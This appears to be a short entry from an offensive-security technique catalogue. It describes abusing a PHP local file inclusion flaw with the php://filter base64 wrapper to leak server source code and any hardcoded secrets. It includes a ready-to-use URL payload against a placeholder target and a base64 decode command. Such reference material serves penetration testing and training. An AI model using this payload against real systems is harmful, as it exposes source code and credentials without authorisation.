← Back to search

Read PHP Source via php://filter LFI

exploitationtool

Summary

Abuse an LFI with the php://filter base64 wrapper to leak PHP source code, then decode the returned blob locally.

Walkthrough

When a parameter is vulnerable to LFI, the php://filter wrapper lets you read PHP source instead of executing it.

Steps

  1. Request the target file through php://filter/convert.base64-encode/resource=<file> so the source is returned base64-encoded rather than run.
  2. Copy the encoded output and decode it locally with base64 -d to recover the readable source (and any hardcoded secrets).

Commands

other

https://<TARGET>/admin/?debug=php://filter/convert.base64-encode/resource=master.php

bash

echo "PGgxPDQo/Pg==" | base64 -d > master.php